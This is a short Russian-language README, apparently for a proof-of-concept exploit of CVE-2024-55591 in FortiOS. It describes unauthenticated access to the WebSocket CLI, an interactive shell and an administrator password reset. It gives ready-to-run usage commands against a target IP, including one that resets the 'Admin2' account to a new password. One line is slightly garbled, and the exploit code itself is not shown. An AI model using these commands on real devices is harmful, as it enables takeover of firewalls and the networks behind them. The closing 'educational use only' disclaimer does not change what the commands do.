
Эксплойт proof-of-concept для CVE-2024-55591, обеспечивающий неаутентифицированный доступ к WebSocket CLI на устройствах FortiOS, с интерактивной оболочкой и сбросом пароля администратора.
Это инструмент Proof-of-Concept (PoC) для эксплуатации CVE-2024-55591 — уязвимости в FortiOS, которая позволяет получить неавторизованный доступ к CLI через WebSocket.
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
Затем используйте приглашение:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
Отказ от ответственности: Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования.